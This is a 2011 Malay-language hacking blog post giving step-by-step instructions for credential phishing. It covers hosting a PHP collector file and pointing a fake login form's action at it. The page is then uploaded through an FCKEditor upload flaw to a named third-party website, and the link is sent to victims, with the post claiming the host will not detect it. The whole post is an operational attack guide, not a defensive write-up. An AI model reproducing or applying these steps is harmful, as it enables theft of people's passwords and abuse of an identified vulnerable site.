Wednesday, 30 November 2011

Phishing Yang Tak Akan Kena Ban!!

Assalamualaikum dan salam 1Malaysia.....seperti yg dijanjikan next post adalah tutorial hacking.hari ini aku nk ajar anda cara phishing yg TAK AKAN KENA BAN.aq dah test.sbb memang aq guna cara ni.hehehe...baiklah jom mula... Sebelum tu CLICK SINI 

Sebelum tu kepada yg masih x tahu cara nk register webhosting dan create phishing page di dalam file manager boleh rujuk sini:
Phishing Facebook

Langkah 1- Create file .php di webhosting :



Create file .php anda di webhosting.

Langkah 2 - Copy Link File .php anda



Copy link file .php anda.
rujuk gambar di bawah :


Tengok pada file php anda.tengok pada "open"



Right click pada "open", dan copy link


Langkah 3 - Edit File Html

Selepas itu, edit file html anda di dalam notepad.
Cara2nya :

1. tekan CTRL+F
2. Cari perkataan :  action=
3. setelah anda menjumpainya,anda akan nmpak di depan action= cuma tertera nama file.
Contoh: 
action='write.php'

4. Anda harus tukarnya kepada link file php anda.

Contoh:
action='domain.hosting.com/apa2.php <---- nama file php anda

5. Setelah siap, save file html anda itu.

Rujuk gambar di bawah :



Sebelum






Selepas





Langkah 4 - Upload file phishing menggunakan FCKEditor :

Note : Bagi yg masih belum tahu cara nk upload file menggunakan FCKeditor bolehlah rujuk sini : FCKEditor Deface

1. Baiklah sekarang anda harus upload file html anda itu menggunakan FCKEditor.Setelah itu anda bolehlah test phishing anda itu!!

Website vuln cadangan : http://www.schoolshopper.com.au

Contoh Link Phishing anda :
http://www.schoolshopper.com.au/phishing.html

2. Sekarang anda boleh lah menghantar link phishing anda itu kepada mangsa anda!

note1 : phishing ini sama seperti phishing biasa.file yg berisi password dan email akan muncul di dalam webhosting anda.cuma kelainannya webhosting tidak akan dapat kesan file phishing.

note2 : anda tidak perlu delete file php anda yg berada di dalam webhosting anda itu setelah habis phishing.



Baiklah sampai di sini sahaja untuk Tutorial pada kali ini.aku harap anda mendapat ilmu yg berguna pada kali ini.Assalamualaikum dan selamat memancing!!!





Item Reviewed: Phishing Yang Tak Akan Kena Ban!! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com